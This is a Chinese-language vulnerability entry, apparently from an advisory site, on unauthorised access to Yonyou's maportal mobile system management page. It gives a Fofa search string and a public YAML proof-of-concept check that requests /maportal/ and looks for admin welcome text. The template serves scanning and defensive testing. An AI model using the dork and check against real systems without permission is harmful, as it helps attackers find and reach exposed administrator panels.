yonyou-maportal-unauth: 用友移动系统管理 maportal 未授权访问

日期: 2025-09-01 | 影响软件: yonyou maportal | POC: 已公开

漏洞描述

Fofa: "移动系统管理"

PoC代码[已公开]

id: yonyou-maportal-unauth

info:
  name: 用友移动系统管理 maportal 未授权访问
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: "移动系统管理"
  tags: yonyou,unauth
  created: 2024/01/07

rules:
  r0:
    request:
      method: GET
      path: /maportal/
    expression: response.status == 200 && response.body.bcontains(b"欢迎你") && response.body.bcontains(b"管理员")
expression: r0()

相关漏洞推荐